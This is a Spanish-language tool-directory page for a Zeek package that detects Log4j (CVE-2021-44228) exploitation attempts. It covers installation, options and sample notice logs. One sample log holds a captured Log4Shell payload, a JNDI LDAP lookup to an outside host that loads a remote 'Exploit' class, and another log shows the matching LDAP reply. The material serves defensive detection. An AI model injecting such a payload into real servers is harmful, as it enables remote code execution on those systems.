Skip to content
KitploitKITPLOIT
HerramientasBlog
Log in
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2021-44228 — Paquete de Zeek para detectar intentos de explotación de Log4j CVE-2021-44228 mediante cargas útiles en cabeceras HTTP, descargas de clases Java LDAP y descargas de clases Java de segunda etapa, con registro configurable y generación de avisos. | Kitploit
Herramientas/GitHubGitHub/corelight/cve-2021-44228
Análisis de VulnerabilidadesExplotaciónSeguridad WebSeguridad de RedesDetección de IntrusionesAnálisis de Registros
GitHubcorelight/cve-2021-44228

cve-2021-44228

Paquete de Zeek para detectar intentos de explotación de Log4j CVE-2021-44228 mediante cargas útiles en cabeceras HTTP, descargas de clases Java LDAP y descargas de clases Java de segunda etapa, con registro configurable y generación de avisos.

Ver Repositorio
19915hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-44228

Un paquete de Zeek que genera avisos, etiqueta conexiones HTTP y opcionalmente genera un registro para intentos de Log4J (CVE-2021-44228).

  • Detecta el payload contenido en cabeceras HTTP: Consulte Simplifying Detection of Log4Shell para más detalles.

  • Usa firmas de Zeek para generar avisos cuando un archivo Java se devuelve durante una búsqueda LDAP. Consulte Detecting Log4j via Zeek & LDAP traffic para más detalles.

  • Detecta cuando se descarga una clase Java de segunda etapa, independientemente del payload y de la detección de la primera etapa. Consulte Detecting Log4j exploits via Zeek when Java downloads Java para más detalles.

Instalación

$ zkg install cve-2021-44228

Úselo contra un pcap que ya tenga:

$ zeek -Cr scripts/__load__.zeek your.pcap

Si se instala desde una versión del repositorio clonada con git clone, tenga en cuenta que la rama predeterminada es la de desarrollo. Instale desde master o desde un release para una versión más estable del paquete.

Opciones y notas:

  • CVE_2021_44228::log determina si se genera el registro log4j. El valor por defecto es T.
  • CVE_2021_44228::ignorable_target_hosts es un conjunto de target_hosts que se deben ignorar. Es un set[string], por lo que se pueden ignorar tanto IPs como dominios.
  • CVE_2021_44228::ignorable_orig_hosts es un conjunto de addrs provenientes de escáneres benignos conocidos que se pueden ignorar.
  • CVE_2021_44228::ignorable_resp_hosts igual que el anterior, pero para resps.
  • CVE_2021_44228::try_normalize determina si se debe intentar normalizar el payload. El valor por defecto es T.

Avisos de ejemplo

Este paquete genera tres avisos distintos:

  1. LOG4J_ATTEMPT_HEADER
  2. LOG4J_LDAP_JAVA
  3. LOG4J_JAVA_CLASS_DOWNLOAD

LOG4J_ATTEMPT_HEADER señala posibles intentos basados en datos de cabeceras HTTP. Estos también se registran en log4j si está habilitado.

#separator \x09
#set_separator  ,
#empty_field    (empty)
#unset_field    -
#path   notice
#open   2021-12-14-11-50-29
#fields ts      uid     id.orig_h       id.orig_p       id.resp_h       id.resp_p       fuid    file_mime_type  file_desc       proto   note    msg     sub     src     dst     p       n       peer_descr      actions email_dest      suppress_for    remote_location.country_code    remote_location.region  remote_location.city    remote_location.latitude        remote_location.longitude
#types  time    string  addr    port    addr    port    string  string  string  enum    enum    string  string  addr    addr    port    count   string  set[enum]       set[string]     interval        string  string  string  double  double
1639350256.733555       Cp7gaS3nVqVl49obpb      154.65.28.250   57932   172.16.4.58     80      -       -       -       tcp     CVE_2021_44228::LOG4J_ATTEMPT_HEADER    Possible Log4j exploit CVE-2021-44228 exploit in header. Refer to sub field for sample of payload, original_URI and list of server headers      uri='/', payload_uri=45.83.193.150:1389/Exploit, payload_stem=45.83.193.150:1389, payload_host=45.83.193.150, payload_port=1389, method=GET, is_orig=T, header name='AUTHORIZATION',  header value='Bearer ${jndi:ldap://45.83.193.150:1389/Exploit}'       154.65.28.250   172.16.4.58     80      -       -       Notice::ACTION_LOG      (empty) 3600.000000     -       -       -       -       -
#close  2021-12-14-11-50-29

LOG4J_LDAP_JAVA detecta LDAP descargando bytecode de Java. En la práctica, observamos que esto ocurre con tan poca frecuencia que constituye un buen indicador indirecto de posibles exploits exitosos.

#separator \x09
#set_separator	,
#empty_field	(empty)
#unset_field	-
#path	notice
#open	2021-12-16-20-54-13
#fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	fuid	file_mime_type	file_desc	proto	note	msg	sub	src	dst	p	n	peer_descr	actions	email_dest	suppress_for	remote_location.country_code	remote_location.region	remote_location.city	remote_location.latitude	remote_location.longitude
#types	time	string	addr	port	addr	port	string	string	string	enum	enum	string	string	addr	addr	port	count	string	set[enum]	set[string]	interval	string	string	string	double	double
1639425815.885952	ClEkJM2Vm5giqnMf4h	172.16.238.10	57650	172.16.238.11	1389	-	-	-	tcp	Signatures::Sensitive_Signature	172.16.238.11: log4j_javaclassname_tcp	0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07...	172.16.238.11	172.16.238.10	1389	-	-	Notice::ACTION_LOG	(empty)	3600.000000	-	-	-	-	-
1639425815.885952	ClEkJM2Vm5giqnMf4h	172.16.238.10	57650	172.16.238.11	1389	-	-	-	tcp	CVE_2021_44228::LOG4J_LDAP_JAVA	Possible Log4j exploit CVE-2021-44228 exploit, JAVA over LDAP. Refer to sub field for sample of payload.	0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07Exploit	172.16.238.10	172.16.238.11	1389	-	-	Notice::ACTION_LOG	(empty)	3600.000000	-	-	-	-	-
1639425834.635341	CUM0KZ3MLUfNB0cl11	172.16.238.10	57742	172.16.238.11	1389	-	-	-	tcp	Signatures::Sensitive_Signature	172.16.238.11: log4j_javaclassname_tcp	0\x81\x90\x02\x01\x02d\x81\x8a\x04\x01a0\x81\x840\x16\x04\x0djavaClassName1\x05\x04\x03foo0*\x04\x0cjavaCodeBase1\x1a\x04\x18http://172.16.238.11:80/0$\x04\x0bobjectClass1\x15\x04\x13javaNamingReference0\x18\x04\x0bjavaFactory1\x09\x04\x07...	172.16.238.11	172.16.238.10	1389	-	-	Notice::ACTION_LOG	(empty)	3600.000000	-	-	-	-	-
#close	2021-12-16-20-54-13

Finalmente, LOG4J_JAVA_CLASS_DOWNLOAD genera un aviso cuando estamos seguros de que Java descarga más Java. Al igual que arriba, esto ocurre con tan poca frecuencia que resulta útil como detección indirecta.

Descargar herramienta